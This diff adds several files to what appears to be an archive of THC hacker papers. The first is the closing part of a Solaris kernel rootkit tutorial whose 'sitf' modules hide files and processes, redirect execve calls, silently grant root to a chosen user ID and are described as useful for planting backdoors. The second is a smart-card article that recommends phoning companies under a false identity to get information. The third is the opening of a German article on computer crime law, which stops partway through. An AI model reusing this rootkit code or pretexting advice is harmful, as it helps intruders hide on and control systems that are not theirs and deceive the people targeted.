+<br><tt>#ifdef DEBUG</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+cmn_err(CE_NOTE,"hiding process: %s", info->pr_psargs);</tt>
+<br><tt>#endif</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+kmem_free(info, sizeof(psinfo_t));</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+set_errno(ENOENT);</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+return -1;</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; } else</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+kmem_free(info, sizeof(psinfo_t));</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; }</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; return ret;</tt>
+<br><tt>}</tt></blockquote>
+You see that this is really not a proper way to hide processes from being
+listed because a lot cpu power will be wasted by the <tt>open64()</tt>
+and the <tt>read()</tt> call due to the fact that they got called very
+often on any system. A really fast method can be found in 5.6 Hiding processes
+(structured proc approach), just read on.</blockquote>
+<font size=+1>--->&nbsp;&nbsp; Module: sitf0.1.c&nbsp;</font>
+<blockquote>The module sitf0.1.c (Solaris Integrated Trojan Facility) demonstrates
+all topics described above, it is configured by setting the following variables:
+<ol><tt>#define MAGIC&nbsp;&nbsp; "CHT.THC"</tt>
+<br><tt>#define KEY&nbsp;&nbsp;&nbsp;&nbsp; "mykey"</tt>
+<br><tt>#define UID&nbsp;&nbsp;&nbsp;&nbsp; 1001</tt></ol>
+If a file or a process includes the string <tt>MAGIC</tt>, it will not
+be listed by any tool. Directories or file content of files containing
+this string will also be unaccessiable if the security flag is set. You
+can toggle the security flag by using the touch command, <tt>KEY</tt> is
+the argument for touch.
+<blockquote><tt>$ touch mykey</tt></blockquote>
+The UID specifies the user id that should automatically be mapped to root
+if a user logs on.You can monitor all activities via syslogd if you compiled
+the module with the <tt>DEBUG</tt> defintion.</blockquote>
+<font size=+1>5.5&nbsp;&nbsp; Redirecting an execve() call</font>
+<blockquote>Redirecting the execve() call was really a challange on Solaric
+(Sparc), because the kernel really "cares" about a proper user- and kernel
+memory transfer. The following code does not allocate user memory, it simply
+overwrites the defined buffer with the new command to execute, eventhough
+I have tested this call a thousand times and nothing bad happened, I advice
+you to read the next version of this article, that will feature some
+techniques
+to allocate user memory properly.
+<blockquote><tt>#define OLDCMD&nbsp; "/bin/who"</tt>
+<br><tt>#define NEWCMD&nbsp; "/usr/openwin/bin/xview/xcalc"</tt>
+<br><tt>char oldcmd[] = OLDCMD;</tt>
+<br><tt>char newcmd[] = NEWCMD;</tt>
+<p>[...]
+<p><tt>int newexecve(const char *filename, const char *argv[], const char
+*envp[])</tt>
+<br><tt>{</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; int ret;</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; char *name;</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; unsigned long addr;&nbsp;</tt>
+<p><tt>&nbsp;&nbsp;&nbsp; name = (char *) kmem_alloc(256, KM_SLEEP);</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; copyin(filename, name, 256);</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; if (!strcmp(name, (char *) oldcmd)) {</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; copyout((char *) newcmd,
+(char *) filename, strlen(newcmd) + 1);</tt>
+<br><tt>#ifdef DEBUG</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; cmn_err(CE_NOTE,"sitf:
+executing %s instead of %s", newcmd, name);</tt>
+<br><tt>#endif</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; }</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; kmem_free(name, 256);&nbsp;</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; return oldexecve(filename, argv, envp);</tt>
+<br><tt>}</tt></blockquote>
+</blockquote>
+<font size=+1>5.6&nbsp;&nbsp; Hiding processes (structured proc approach)</font>
+<blockquote>This is a proper approach for hiding processes from being listed.
+Take a look at the header file <tt>/usr/include/sys/proc.h</tt>, you will
+find inside the large <tt>proc_t</tt> struct a member that is called <tt>struct
+user p_user</tt>. Every process owns such a <tt>proc_t </tt>struct. Solaris
+generates the files inside the /proc directory from these <tt>proc_t</tt>
+entries and their corresponding values. If you look into the definition
+of the <tt>user</tt> struct in <tt>/usr/include/sys/user.h</tt>, you will
+find what I was looking for the last weeks:
+<ol><tt>typedef struct&nbsp; user {</tt>
+<p>[...]
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; /*</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; * Executable file
+info.</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; */</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; struct exdata&nbsp;&nbsp;
+u_exdata;</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; auxv_t&nbsp; u_auxv[__KERN_NAUXV_IMPL];
+/* aux vector from exec */</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; char&nbsp;&nbsp;&nbsp;
+u_psargs[PSARGSZ];&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; /* arguments from exec
+*/</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; char&nbsp;&nbsp;&nbsp;
+u_comm[MAXCOMLEN + 1];</tt>
+<p>[...]</ol>
+The member <tt>u_psargs</tt> carries the executed filename of a process
+and its arguments, this is a good place to check if we should hide the
+process. There is a little macro defintion in proc.h that helps us getting
+the <tt>p_user</tt> entry from <tt>proc_t</tt>:
+<ol><tt>/* Macro to convert proc pointer to a user block pointer */</tt>
+<br><tt>#define PTOU(p)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+(&amp;(p)->p_user)</tt></ol>
+Now we can determine the exectued filename of every process if we know
+where the <tt>proc_t</tt> struct is. Another nice funtions helps us finding
+the <tt>proc_t</tt> struct from a corresponding <tt>pid:</tt> <tt>proc_t
+*prfind(pid_t). </tt>A tool listing process accesses the /proc directory
+that stores the processes sorted by their <tt>pids</tt>. I included a small
+check into the <tt>getdents64()</tt> fake syscall from above, so the function
+<tt>check_for_process()
+</tt>gets
+called.
+<blockquote>[...]
+<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <tt>while (i > 0) {</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+reclen = buf3->d_reclen;</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+i -= reclen;</tt>
+<p><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+if ((strstr((char *) &amp;(buf3->d_name), (char *) &amp;magic) != NULL)
+||</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+check_for_process((char *) &amp;(buf3->d_name))) {</tt>
+<br><tt>#ifdef DEBUG</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+cmn_err(CE_NOTE,"sitf: hiding file/process (%s)", buf3->d_name);</tt>
+<br><tt>#endif</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+if (i != 0)</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+memmove(buf3, (char *) buf3 + buf3->d_reclen, i);</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+else</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+buf3->d_off = 1024;</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+ret -= reclen;</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+}</tt>
+<p>[...]</blockquote>
+Now let's take a look at the <tt>check_for_process()</tt> function. In
+the following code I use a small function called <tt>sitf_isdigit()</tt>
+and <tt>sitf_atoi()</tt>, you should easily guess what these function do.
+In this content it tells us if the file is maybe inside the proc and represents
+a pid. The <tt>check_process()</tt> call implements the mechanism described
+above:
+<br>&nbsp;
+<blockquote><tt>int check_for_process(char *filename)</tt>
+<br><tt>{</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; if (sitf_isdigit(filename) &amp;&amp; check_process(sitf_atoi(filename)))</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return TRUE;</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; else</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return FALSE;</tt>
+<br><tt>}</tt>
+<p><tt>int check_process(pid_t pid)</tt>
+<br><tt>{</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; proc_t *proc;</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; char *psargs;</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; int ret;</tt>
+<p><tt>&nbsp;&nbsp;&nbsp; proc = (proc_t *) prfind(pid);</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; psargs = (char *) kmem_alloc(PSARGSZ, KM_SLEEP);&nbsp;</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; if (proc != NULL)</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; /*</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; * PTOU(proc)->u_psargs
+is inside the kernel memory, no special</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; * copy methods
+are needed.</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; */&nbsp;</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; memcpy(psargs, PTOU(proc)->u_psargs,
+PSARGSZ);</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; else&nbsp;</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return FALSE;</tt>
+<p><tt>&nbsp;&nbsp;&nbsp; if (strstr(psargs, (char *) &amp;magic) != NULL)</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ret = TRUE;</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; else&nbsp;</tt>
+<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ret = FALSE;</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; kmem_free(psargs, PSARGSZ);</tt>
+<br><tt>&nbsp;&nbsp;&nbsp; return ret;</tt>
+<br><tt>}</tt></blockquote>
+</blockquote>
+<font size=+1>--->&nbsp;&nbsp; Module: sitf0.2.c</font>
+<blockquote>The sitf0.2.c (Solaris Integrated Trojan Facility) implements
+the features described in 5.5 and 5.6, it is configured as the sitf0.1
+module and includes the following 2 defintions:
+<blockquote><tt>#define OLDCMD&nbsp; "/bin/who"</tt>
+<br><tt>#define NEWCMD&nbsp; "/usr/openwin/bin/xview/xcalc"</tt></blockquote>
+If the file <tt>OLDCMD</tt> is executed the <tt>NEWCMD</tt> will be executed
+instead, this is a usefull feature for placing backdoors in hidden directories.&nbsp;</blockquote>
+
+<hr ALIGN=LEFT SIZE=1 NOSHADE WIDTH="100%">
+<br>&nbsp;
+<p><font size=+1>6&nbsp; Future plans</font>
+<ul>If you read the article carefully, you may have found a lot of things
+to be fixed in future releases, here is a brief summary of my ideas and
+plans for the next version - including fixes and improvements:
+<ul>- Proper implementation of allocating user memory
+<br>- Bugfree version of the <tt>getdents64()</tt> file hiding mechanism
+allowing files to contain the magic word more than once.
+<br>- Proper hiding of the module by backdooring the ksyms module
+<br>- ICMP backdoor executing programs realized backdooring the icmp module
+<br>- Hiding connections from netstat
+<br>- UDP based telnet access via the udp module (damn, this is hard stuff.
+Idea by Escher)
+<br>- A module version for Solaris 2.5 (Sparc) and 2.6 (Sparc/x86)</ul>
+As a result of this article I also plan to write a security module for
+Solairs 2.7 (Sparc/x86) including the following features:
+<ul>- Protected module loading and unloading
+<br>- Limited process listings for users
+<br>- Symlink checks in writable directories
+<br>- Kernel based packet sniffing
+<br>- Exploited overflow notification</ul>
+</ul>
+
+<hr ALIGN=LEFT SIZE=1 NOSHADE WIDTH="100%">
+<br>&nbsp;
+<p><font size=+1>7&nbsp;&nbsp; Closing words</font>
+<blockquote>I thank the following people that helped creating this article:
+<blockquote>- Wilkins&nbsp; ... for all his help, betatesting and ideas
+<br>- Pragmatic ... for his articles and support at the CCCamp
+<br>- Acpizer ... for all his knowledge and help with the modules
+<br>- Escher ... for his Solaris 2.5 support and corrections
+<br>- Horizon ... for his Ultra Sparc port and his help
+<br>- Knie ... godfather of OpenBSD
+<br>- Plaguez ... for his great itf.c Linux module (written in '97)
+<br>- Ekonroth from the church of shambler ... for mental support&nbsp;
+<br>- All people in my favorite IRC channel</blockquote>
+I would also like to thank my girlfriend who spent a lot of time with me
+talking about Solaris' kernel-architecture.
+<p>If you have ideas, critisism or further questions, please contact me
+at <a href="mailto:plasmoid@pimmel.com">plasmoid@pimmel.com</a>. I am thankful
+for improving suggestions. Just don't forget this article is not designed
+for script kiddies, intrusion is illegal and I don't have the ambition
+to help you hacking into some lame provider systems.&nbsp;
+<br>If you read this far, you might also be interested in one of the other
+THC articles or magazines at <a href="http://www.thc.org">http://www.thc.org/</a>.</blockquote>
+
+<blockquote>have fun,
+<br>Plasmoid / THC
+<br>&nbsp;
+<br>&nbsp;
+<blockquote>&nbsp;</blockquote>
+</blockquote>
+</td>
+</tr>
+</table></center>
+
+</body>
+</html>

Papers/smartcrd.txt

@@ -0,0 +1,51 @@
+
+SMART CARDS
+
+by Morcc/THC
+
+New applications for smart cards are being discovered on a daily basis,
+overriding former simple uses such as memory cards (telephone cards)
+which have been dominant to date. Today, with an expanding market for
+highly sophisticated applications, the time for the smart card has come.
+Examples of these "smarter" cards are SiM cards for the C and D nets of the
+mobile phone networks of German Telekom & Mannesman, banking cards, ID cards
+and access control cards. Smart cards are also synonymous with security.
+Smart cards are used for communication. The information they contain is
+requested by reader devices and then forwarded to further processing.
+Within then GSM network the card has the function of a key. As a SiM it
+allows access to the network. To ensure that smart cards and terminals
+communicate correctly and that data is exchanged smoothly and without
+error, some companies offer a SiM simulator which reproduces the behaviour
+of the card during the session with the terminal and creates a protocol log
+of the procedure. The SiM simulator is very interesting, it looks a little
+bit weird but that doesn't matter. One of these SiM simulators is called
+Test SiM and its main area of application is in spot checks during quality
+tests, i.e. during the development of mobile telephones. The SiM editor is
+the software which is used to r/w to the card's memory. One of these
+editors is called Dr. SiM, a very popular device, because every fool can
+operate it. Some smart card companies already developed cards for UNiX
+computer security. This is secured for workstations within a UNiX LAN.
+The system is called X-Secure. The user identifies himself with a personal
+ID number whichis on the card. A two-way dialogue then takes place between
+the card and the computer, involving high security checks. Once access has
+been granted, the user can use the system.
+In the future we will all use smart cards. As a electronic wallet, for
+medical purposes, electronic locking, systematic traffic control and
+electronic toll collection. Security will be better and better, but there
+are always ways around it. The best way to get good information is to call
+one of the smart card companies and tell them you're Mr. X from the X company
+and that you're interested in the smart card technology because you're planning
+to use smart cards in the company. If you have the right feeling how to talk
+with people on the phone you'll get the best informations.
+
+If you don't know numbers of such companies, here are some of them...
+
+Germany +49-5254-991-0
+UK      +44-1491-41-0997
+USA     +1-610-993-9810
+
+I hope that you know have a basic idea of smart cards and that you want to
+know more about it. Go ahead! Start with collecting more information.
+
+Bye,
+Morcc/THC

Papers/strafrec.txt

@@ -0,0 +1,302 @@
+
+
+                             Strafrecht im Netz
+
+                               by Judge Dread
+
+
+
+
+
+Dieser Artikel moechte mit einigen gelaeufigen Irrtuemern aufraeumen, und ueber
+die tatsaechliche Auslegung von Strafgesetzen informieren, um zu vermeiden,
+dass ihr durch eklatanten Mangel an Rechtskenntnis in die Netze der
+Strafverfolgung geratet.
+Der Autor weist ausdruecklich darauf hin, dass auch er als Mensch anfaellig
+fuer Fehler ist und in diesem Fall keinerlei Verantwortung fuer sein
+Geschreibsel uebernimmt, jedoch hat er versucht alles nach seinem besten
+Wissen und im Einklang der aktuellen Rechtssprechung darzulegen.
+
+
+
+   Gliederung :   1. Internationales Strafrecht
+                  2. Deutsche Strafvorschriften
+                  2.1 Das Strafgesetzbuch
+                  2.1.1 Die Datenveraenderung
+                  2.1.2 Computersabotage
+                  2.1.3 Computerbetrug
+                  2.1.4 Ausspaehen von Daten
+                  2.1.5 Erschleichen von Leistungen
+                  2.1.6 Faelschung technischer Aufzeichnungen und
+                        beweiserheblicher Daten
+                  2.2 Vorschriften des Nebenstrafrechts
+                  2.2.1 Verrat von Betriebsgeheimnissen
+                  2.2.2 Unerlaubte Verwertung urheberrechtlich
+                        geschuetzter Werke
+                  3. Tabellenuebersicht ueber die behandelten Paragraphen
+
+
+
+1. Internationales Strafrecht
+
+Entgegen landlaeufigen Vorstellungen der Art "Wenn ich in Daten auslaendischer
+Firmen hacke, kann mir keiner" kennt die internationale Strafrechtspraxis
+nicht nur keine derart groben Luecken, sondern auch viel feinere nicht.
+Zunaechst gilt das Territorialitaetsprinzip, d.h. das deutsche Strafrecht
+(3 StGB) und die deutsche Strafjustiz (7 Abs. 1 StPO) sind fuer Taten
+zustaendig, die in Deutschland begangen wurden. Dabei wird auf den Ort
+der Tat abgestellt.
+Der Ort der Tat ist jeder Ort, an dem der Taeter gehandelt hat und jeder
+Ort, an dem der tatbestandliche Erfolg eingetreten ist (9 Abs. 1 StGB).
+Das bedeutet fuer die Rechtsprechung, dass der blosse Aufenthalt bei der
+Tathandlung in Deutschland fuer die Anwendbarkeit deutschen Rechts genuegt und
+auch das Vorliegen nur einer der Tatbestandsvoraussetzungen (das ist z.B. beim
+263a eine Datenveraenderung) im jeweiligen Inland das Eingreifen der
+Kriminaljustiz erlaubt.
+Es wird wohl auch unschwer zu erraten sein, dass die meisten Staaten dieses
+oder ein aehnliches Territorialitaetsprinzip auch auf sich anwenden. Wo immer
+noch Strafverfolgungsluecken entstehen sollten, greift dann z.B. das passive
+Personalitaetsprinzip (7 Abs. 1 StGB) oder das aktive Personalitaetsprinzip
+(7 Abs. 2 Satz 1 StGB) ein, nach denen fuer die Strafbarkeit in Deutschland
+genuegt, dass entweder einE DeutscheR geschaedigt wurde, oder einE DeutscheR
+die Strafbare Handlung begangen hat.
+
+
+2. Deutsche Strafvorschriften
+
+Was gibt es ueberhaupt fuer "strafbare Handlungen", also Straftatbestaende?
+
+Seit dem "2. Gesetz zur Bekaempfung der Wirtschaftskriminalitaet" von 1986
+einige mehr.
+Nach einschlaegigen Untersuchungen gehen ca. 80% der Computerkriminalitaet auf
+sogenannte "Innentaeter" zurueck, d.h. solche, die fuer die betroffenen Betriebe
+arbeiten und Zugang zu den meisten Daten haben. Dieser Personenkreis verschafft
+sich den Zugriff auf die Daten also nicht durch ueberragende Hackerkenntnisse,
+sondern durch ihre von vornherein bevorzugte Position - und selbst sie werden
+durch unglueckliche Zufaelle oft erwischt!
+Allerdings ist die Aufklaerungsquote vergleichsweise niedrig; deshalb sah
+sich der Gesetzgeber veranlasst, der Computerkriminalitaet mit z.T. sehr
+unbestimmten Straftatbestaenden entgegenzutreten, die in der juristischen
+Literatur zwar scharf kritisiert, in der Rechtsprechungspraxis aber in ihrer
+ganzen Weite angewendet werden.
+Die entscheidenden Strafgesetze, die eure Computeraktivitaeten betreffen
+koennen, und ihre tatsaechliche aktuelle Auslegung durch die Rechtsprechung
+will ich hier kurz erlaeutern.
+Vorweg will ich nur kurz eine Information schicken : Wegen Hacking und/oder
+Phreaking, Kreditkartenmissbrauch etc. darf in Deutschland *nicht* das
+Telefon abgehoert werden (StPO 100a-i).
+
+
+2.1 Das Strafgesetzbuch
+
+Diese Ergaenzungen zum Sachbeschaedigungstatbestand wollen das Eigentum an
+Daten und Datensystemen und deren Integritaet schuetzen. Folgende Gesetze
+des Strafgesetzbuchs versuchen das zu gewaehrleisten :
+
+2.1.1 Die Datenveraenderung (303a StGB)
+
+umfasst jedes rechtswidrige Loeschen, Unterdruecken, Unbrauchbarmachen oder
+Veraendern von Daten.
+"Rechtswidrig" ist alles, was euch nicht der Eigentuemer erlaubt hat.
+"Veraendern" meint auch ein Beeintraechtigen des eigentlichen Zwecks oder
+Informationsgehalts.
+Das Einbringen von Viren ist typischer Anwendungsbereich des 303a.
+Fuer die Erfuellung des Tatbestands ist es nicht erforderlich, dass die Daten
+irgendwelche wirtschaftliche Bedeutung haben.
+Zivilrechtliche Ansprueche auf Schadensersatz aus dem Deliktsrecht der 823ff.
+BGB bleiben davon - wie uebrigens in allen anderen computerstrafrechtlichen
+Fallkonstellationen auch - unberuehrt. Solche Schadensersatzansprueche koennen
+nach einer rechtskraeftigen strafrechtlichen Verurteilung ohne weiteres, quasi
+automatisch, geltend gemacht werden und erstrecken sich auf die volle Hoehe
+der verursachten Schaeden und Folgeschaeden (z.B. Betriebsausfall etc.).
+Als GeschaedigteR wird auch einE bloss ZugriffsbefugteR betrachtet.
+
+2.1.2 Computersabotage (303b StGB)
+
+Hier geht es um die Stoerung wesentlicher Datenverarbeitungen in einem fremdem
+Betrieb, einem fremden Unternehmen oder Behoerde durch Taten nach 303a StGB
+oder dadurch, dass die ordnungsgemaesse Verwendung der Daten unmoeglich gemacht
+wird.
+Ob die Tat Software oder Hardware beschaedigt, ist egal.
+"Fremd" ist ein Betrieb oder Unternehmen, das sich nicht im Alleineigentum
+des Saboteurs befindet.
+Eine "Stoerung" ist jede nicht unerhebliche Beeintraechtigung des reibungslosen
+Ablaufs.
+Ob eine Datenverarbeitung "wesentliche" Bedeutung hat, haengt davon ab, wie
+wichtig sie fuer den Betrieb ist.
+Den Begriff der "Datenverarbeitung" legt die Rechtsprechung so weit aus, dass
+er sich auf jeden Umgang mit Daten erstreckt (auch Daten auf Papier z.B.).
+
+2.1.3 Computerbetrug (263a StGB)
+
+Dieser Tatbestand setzt die Absicht voraus, "sich oder einem Dritten einen
+rechtswidrigen Vermoegensvorteil zu verschaffen".
+Der Gesetzgeber wollte damit die Luecke schliessen, die der Betrugstatbestand
+(263 StGB) dadurch liess, dass er eine Taeuschung mit den Mitteln der
+Datenverarbeitung nicht erfasste.
+Desweiteren wird der 263 StGB als Auffangtatbestand verwendet, besonders
+die 3. und 4. Variante (die Datenverarbeitung "durch unbefugte Verwendung von
+Daten oder sonst durch unbefugte Einwirkung auf den Ablauf" beeinflussen).
+In Verbindung mit dem sehr weit ausgelegten Datenbegriff des 263a StGB, der
+auch "noch nicht eingegebene Daten" umfasst, ergibt sich nach der heftigen
+Kritik in der Strafrechtswissenschaft eine Verletzung des Bestimmtheitsgebots
+in Artikel 103 Absatz 2 des Grundgesetzes (d.h. die weite und ungenaue
+Tatbestandsbeschreibung erlaubt es dem/der BuergerIn nicht, sein/ihr Verhalten
+vorab auf die gesetzliche Regelung hin abzustimmen, so dass er/sie es vermeiden
+kann, sich strafbar zu machen und verstoesst damit gegen ein rechtsstaatliches
+Prinzip von Verfassungsrang). In seiner unbestimmten Weite umfasst dieser
+Paragraph nahezu alles, was der/die jeweilige RichterIn gerne kriminalisieren
+moechte bzw. kriminalisieren zu muessen glaubt.
+Allerdings: Wenn niemandes Vermoegen dabei geschaedigt wird, kann der Paragraph
+263a StGB nicht angewendet werden.
+Momentan sind einige Strafprozesse wegen sg. "Blueboxings" anhaengig.
+Entgegen der naheliegenden Vermutung, dass in diesen Strafprozessen mit dem
+265a StGB (Erschleichen von Leistungen) angeklagt wurde, greifen die
+Staatsanwaltschaften wegen des hoeheren Strafrahmens auf den 263a StGB
+(Computerbetrug) zurueck. Der Alltagsverstand liegt hier grundsaetzlich
+durchaus richtig: das speziellere Gesetz (also hier Leistungserschleichung von
+"oeffentlichen Zwecken dienenden Fernmeldenetzen") geht grundsaetzlich vor
+dem allgemeiner gefassten Auffangtatbestand (in diesem Fall Computerbetrug).
+Aufgrund vermeintlicher praeventiver Notwendigkeit werden hier die Gesetzes-
+konkurrenzen jedoch dahingehend umgestellt, dass mit der eigentlich nicht
+einschlaegigen Strafnorm das spezielle Gesetz ausgehebelt wird, um einen
+moeglichst hohen Strafrahmen zu erreichen (mit bis zu 5 Jahren Haft statt 1
+Jahr).
+
+2.1.4 Ausspaehen von Daten (202a StGB)
+
+Okay, kommen wir also zum Thema ;-)
+"Wer unbefugt Daten, die nicht fuer ihn bestimmt und die gegen unberechtigten
+Zugang besonders gesichert sind, sich oder einem anderen verschafft, wird
+mit Freiheitsstrafe bis zu drei Jahren oder mit Geldstrafe bestraft."
+Soweit 202a Absatz 1 des StGB.
+"Daten" im Sinne des 202a sind gemaess 202a Abs. 2 nur solche, die "nicht
+unmittelbar wahrnehmbar" sind, also z.B. auf Diskette oder CD, aber keine auf
+Papier geschriebenen.
+Das geschuetzte Rechtsgut des 202a ist die Verfuegungsbefugnis; ausschlaggebend
+ist der Wille des/der Berechtigten.
+Eine technische Zugangssicherung muss vorliegen und ueberwunden werden; ein
+blosses Verbot und seine Missachtung reichen zur Erfuellung des Tatbestands
+nicht aus!
+Als "Verschaffen" wird bereits die Wahrnehmung der Daten betrachtet, nicht
+aber das blosse Hacking, das sich in dem knacken des Computersystems erschoepft.
+Wenn verschluesselte Daten gehackt werden, greift dieser Paragraph nur, falls
+die Daten abgespeichert werden, es sei denn die Ueberwindung der
+Zugangssicherung setzt die Kenntnis der Daten des Zugangscodes voraus.
+Zwei Beispiele: 1. Wenn sich jemand in ein System reinhackt, es nach dem
+erfolgreichen Versuch jedoch SOFORT verlaesst, dann laesst sich der Paragraph
+nicht auf ihn anwenden. Der blosse Versuch des hackens in ein System ist
+nicht strafbar - allerdings leider der einzige der erwaehnten Paragraphen bei
+dem das so ist. 2. Wer sich mit seinem legalen Account auf einem Unix System
+die Passwortdatei kopiert (nicht ge-shadowed) der macht sich ebensowenig
+strafbar, da diese Datei fuer jeden Benutzer zugaenglich ist (keine Sicherung).
+Das Entschluesseln der Passwortdatei (z.B. mit Crack oder John) erfuellt auch
+noch nicht diesen Tatbestand - erst die Nutzung.
+
+2.1.5 Erschleichen von Leistungen (265a StGB)
+
+Das "Erschleichen" der Leistung eines Automaten, des Fernmeldenetzes, der
+Befoerderung durch ein Verkehrsmittel oder des Zugangs einer Veranstaltung "in
+der Absicht, das Entgelt nicht zu entrichten", werden durch diese Vorschrift
+kriminalisiert.
+Auch hier muss eine technische Sicherung gegen "unentgeltliche Inanspruchnahme"
+vorhanden sein und "in ordnungswidriger Weise" "durch taeuschungsaehnliche
+Manipulation" ueberlistet werden. Ein Verbot reicht nicht aus!
+Bzgl. Blueboxing siehe 2.1.3 Computerbetrug
+
+2.1.6 Faelschung technischer Aufzeichnungen und beweiserheblicher Daten
+      (268ff StGB)
+
+Dieses Gesetz verbietet die verfaelschende Beeinflussung und den Gebrauch
+verfaelschend beeinflusster beweiserheblicher Daten "zur Taeuschung im
+Rechtsverkehr". In besonders schweren Faellen droht 269 in Verbindung mit
+267 Absatz 3 "Freiheitsstrafe nicht unter einem Jahr" an.
+Gemaess der "Geistigkeitstheorie" ist der "Aussteller" der "Urkunde", sprich
+der Verfasser des beweiserheblichen Dokuments derjenige, dem "der geistige
+Inhalt zugerechnet wird", also nicht jemand, der die Daten bloss uebermittelt.
+D.h. Manipulierung an Logdateien kann unter diesen Paragraphen fallen.
+
+
+2.2 Vorschriften des Nebenstrafrechts
+
+2.2.1 Verrat von Betriebsgeheimnissen (17 UWG)
+
